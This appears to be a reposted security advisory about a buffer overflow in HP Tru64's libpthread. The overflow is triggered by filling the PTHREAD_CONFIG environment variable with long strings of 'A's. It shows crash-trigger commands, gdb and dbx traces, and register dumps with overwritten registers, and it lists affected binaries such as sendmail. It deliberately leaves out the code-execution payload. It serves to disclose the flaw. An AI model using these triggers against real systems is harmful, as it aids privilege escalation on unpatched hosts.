|
Brought to you by:
Suppliers of:
|
|
|
| |
| The pthread library (libpthread) provides "interfaces for developing multi-threaded applications". libpthread suffers from a buffer overflow vulnerability which may enable an attacker to execute arbitrary commands on the system. This vulnerability may potentially be exploited by a creating a specially crafted buffer and inserting it into the PTHREAD_CONFIG variable. |
| |
Credit:
The information has been provided by Netragard Security Advisories.
|
| |
Vulnerable Systems:
* libpthread version 5.1b (HPUX)
libpthread reads in the PTHREAD_CONFIG environment variable. It may be possible to exploit libpthread on HP's tru64 by creating a specially crafted buffer. The details below do not contain the specially crafted buffer. Exploitation of this specific vulnerability is very difficult.
#############################################
#
# Insert 273 A's (41) into the PTHREAD_CONFIG variable
#
#############################################
OSF1 tru64 V5.1 2650 alpha
bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 273'`
bash-3.00# newaliases
Segmentation fault (core dumped)
#############################################
#
# Insert 274 A's (41) into the PTHREAD_CONFIG variable
#
#############################################
bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 274'`
bash-3.00# newaliases
Unaligned access pid=15750 <newaliases> va=0x11fff00a4 pc=0x3ff805c8bf8 ra=0x3ff805c8bf8 inst=0xa4290040
Unaligned access pid=15750 <newaliases> va=0x11fff00bc pc=0x3ff805c8bfc ra=0x3ff805c8bf8 inst=0xa4490058
Unaligned access pid=15750 <newaliases> va=0x11fff008c pc=0x3ff805c8c48 ra=0x3ff805c8bf8 inst=0xa5090028
#############################################
#
# Run newaliases in gdb with the -q flag.
#
#############################################
bash-3.00# gdb /tmp/newaliases -q
(no debugging symbols found)...(gdb) r
Starting program: /tmp/newaliases
(no debugging symbols found)... (no debugging symbols found)... (no debugging symbols found)... (no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so
#############################################
#
# Execute a back trace (bt) within gdb
#
#############################################
(gdb) bt
#0 0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so
#1 0x3ff805c8a78 in __putFormatEol () from /usr/shlib/libpthread.so
#2 0x3ff805bc4f8 in __utlOptManage () from /usr/shlib/libpthread.so
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414141
This warning occurs if you are debugging a function without any symbols (for example, in a stripped executable). In that case, you may wish to increase the size of the search with the `set heuristic-fence-post' command.
Otherwise, you told GDB there was a function where there isn't one, or (more likely) you have encountered a bug in GDB.
#
# Execute Info Registers within gdb
#
(gdb) i r
v0 0x226 550
t0 0x11fff9b3e 4831812414
t1 0x0 0
t2 0x2 2
t3 0x0 0
t4 0x3ffc0081a00 4396973300224
t5 0x40 64
t6 0x7fffffe6 2147483622
t7 0x19 25
s0 0x4141414141414141 4702111234474983745
s1 0x11fff9c90 4831812752
s2 0x11fff9c88 4831812744
s3 0x0 0
s4 0x0 0
s5 0x11fff9ad8 4831812312
fp 0x1 1
a0 0xbf 191
a1 0x11fff9918 4831811864
a2 0x11fff96b0 4831811248
a3 0x11fff9b34 4831812404
a4 0x0 0
a5 0x11fff9b30 4831812400
t8 0x11fff9931 4831811889
t9 0x62 98
t10 0x49 73
t11 0x1 1
ra 0x3ff805c8bf8 4395905092600
t12 0x3ff801c1380 4395900867456
at 0x41416469 1094804585
gp 0x3ffc01c0170 4396974604656
sp 0x11fff98b0 4831811760
zero 0x0 0
fpcr 0x0 0
pc 0x3ff805c8bf8 4395905092600
vfp 0x11fff9900 4831811840
frame 2
v0 0x226 550
t0 0x11fff9b3e 4831812414
t1 0x0 0
t2 0x2 2
t3 0x0 0
t4 0x3ffc0081a00 4396973300224
t5 0x11fff9a50 4831812176
t6 0x7fffffe6 2147483622
t7 0x19 25
s0 0x1 1
s1 0x11fff9c90 4831812752
s2 0x11fff9c88 4831812744
s3 0x0 0
s4 0x0 0
s5 0x11fff9ad8 4831812312
fp 0x1 1
###############################################
#
# The following registers, a0, a1, a2, a3, a4, a5, have been
# overwritten with A's (0x41).
#
###############################################
a0 0x4141414141414141 4702111234474983745
a1 0x4141414141414141 4702111234474983745
a2 0x4141414141414141 4702111234474983745
a3 0x4141414141414141 4702111234474983745
a4 0x4141414141414141 4702111234474983745
a5 0x4141414141414141 4702111234474983745
t8 0x11fff9931 4831811889
t9 0x62 98
t10 0x49 73
t11 0x1 1
ra 0x3ff805bc4f8 4395905041656
t12 0x3ff801c1380 4395900867456
at 0x41416469 1094804585
gp 0x3ffc01c0170 4396974604656
sp 0x11fff9a80 4831812224
zero 0x0 0
fpcr 0x0 0
pc 0x3ff805bc4f8 4395905041656
############################################
#
# Other binaries which are linked agianst libpthread.so
# will also segfault when the PTHREAD_CONFIG variable
# is set to a large string of A's. The following is
# a list of some of those binaries
#
############################################
/usr/sbin/mailq
/usr/sbin/sendmail
/usr/sbin/sendmail.v8.11.1
/usr/sbin/smtpd
/usr/sbin/collect
/usr/dt/bin/mailcv
############################################
#
# Sendmail Example. Loading sendmail core file with
# the tru64 debugger.
#
############################################
bash-3.00# dbx ./sendmail core
dbx version 5.1
Type 'help' for help.
Core file created by program "sendmail"
warning: ./sendmail has no symbol table -- very little is
supported without it
signal Segmentation fault at >*[__putString, 0x3ff805c8bf8] ldq
t0, 64(s0)
(dbx) where
> 0 __putString(0x0, 0x0, 0x11fffbad8, 0x1, 0x11fffb918)
[0x3ff805c8bf8]
1 __putFormatEol(0x4141414141414141, 0x4141414141414141, 0x4141414141414141, 0x4141414141414141, 0x4141414141414141)
[0x3ff805c8a74]
2 __utlOptManage(0x30002800000, 0x26000, 0x3ff805c09c4, 0x3ffc01b8098, 0x3ff805c0a14) [0x3ff805bc4f4]
################################################
#
# Older versions are also vulnerable...
#
################################################
Older versions are also vulnerable...
tru64.netragard> uname -a
OSF1 tru64.netragard V5.0 910 alpha
tru64.netragard> PTHREAD_CONFIG=`perl -e 'print "A"x 272'`
tru64.netragard> export PTHREAD_CONFIG
tru64.netragard> /usr/dt/bin/mailcv
%PTHREAD_CONFIG keyword
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"
is not valid
Memory fault
Other binareis on 5.0
/usr/bin/ladebug
|
|
|
|
|
